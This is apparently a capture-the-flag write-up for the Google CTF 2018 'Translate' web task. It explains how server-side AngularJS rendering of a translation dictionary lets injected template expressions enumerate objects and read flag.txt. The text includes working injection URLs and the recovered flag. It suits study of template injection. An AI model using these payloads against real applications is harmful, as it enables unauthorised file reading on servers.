Google CTF 2018 Quals: Translate web task solution
| This web application implements a translation service with dictionary stored in memory. | |
| One can dump the JSON dictionary and add values to it. | |
| Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are rather web-site messages, not the words). | |
| The solution is to overwrite the rendered dictionary value and to enumerate methods accessible inside AngularJS sandbox and find a method which allows local file inclusion. | |
| Executing Object.keys(): | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}} | |
| Reading the flag: | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{this.$parent.$parent.i18n.template(%27flag.txt%27)}} | |
| or simply: | |
| http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.template(%27flag.txt%27)}} | |
| => | |
| Result can be accessed on http://translate.ctfcompetition.com:1337/?query=in_lang_query_is_spelled&lang=fr: | |
| CTF{Televersez_vos_exploits_dans_mon_nuagiciel} | |
| One could also just bruteforce or guess the method name ("template"). |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment